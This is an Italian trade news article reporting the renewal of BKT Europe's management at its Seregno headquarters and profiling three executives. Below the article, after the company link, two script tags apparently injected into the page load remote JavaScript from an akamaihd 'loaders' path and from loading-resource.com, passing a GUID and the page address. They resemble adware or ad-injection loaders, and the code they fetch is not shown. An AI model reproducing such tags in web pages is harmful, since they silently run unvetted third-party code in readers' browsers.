1. Home
  2. Notizie e Mercato
  3. BKT: un team rinnovato per la sede europea segno di un forte orientamento alla crescita

BKT: un team rinnovato per la sede europea segno di un forte orientamento alla crescita

Macchine per costruzioni di
5/5
votato da 1 persone
Completamente rinnovato il management dell’headquarter europeo della multinazionale BKT, major player mondiale nella produzione di pneumatici Off-Highway


Lucia Salmaso, oggi AD di BKT Europe, sarà affiancata da Massimiliano Cusimano nel ruolo di Marketing Intelligence Manager e Gabriella Usiello, new entry Marketing and Communication Manager.

Il rinnovamento di management dell’headquarter europero di BKT è segno di una ferma volontà di affermazione e sviluppo che ha portato l’azienda ad un incremento medio annuo del 33%.

Con sede a Seregno, alle porte di Milano, BKT EUROPE opera oggi sotto la direzione dell’Amministratore Delegato Lucia Salmaso, cui si affiancheranno Massimiliano Cusimano, promosso alla carica di Marketing Intelligence Manager e Gabriella Usiello, dal recentissimo ingresso nel team BKT con il ruolo di Marketing and Communication Manager.

Lucia Salmaso, dopo un’esperienza più che trentennale maturata in differenti ruoli e all’interno di aziende leader operanti nei vari segmenti del mercato pneumatici, da gennaio 2009 è entrata a far parte di BKT Europe.  Grazie alle efficaci azioni marketing e commerciali intraprese e ad una forte e personale determinazione, ha saputo portare l’azienda indiana ad essere riconosciuta come major player a livello mondiale nell’offerta di pneumatici Off-Highway.



Massimiliano Cusimano, forte dell’esperienza maturata nell’ambito marketing e comunicazione interno all’azienda assumerà il ruolo di Marketing Intelligence Manager, occupandosi dell’organizzazione ed elaborazione di ricerche di mercato e dei piani di marketing di breve e medio termine con l’importante obiettivo di migliorare le performance di vendita e identificare nuove opportunità di business.



Da gennaio di quest’anno, fa il suo ingresso Gabriella Usiello, da oltre dieci anni introdotta nel marketing di grandi imprese e con una precedente e approfondita esperienza in una multinazionale operante nel settore degli pneumatici per vettura e off-highway, skill che ha determinato la sua scelta.  Nel ruolo di nuovo Marketing and Communication Manager avrà il compito di consolidare il posizionamento del brand attraverso l’implementazione di attività di marketing strategico e un efficace e capillare piano di comunicazione.



www.bkt-tires.com


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>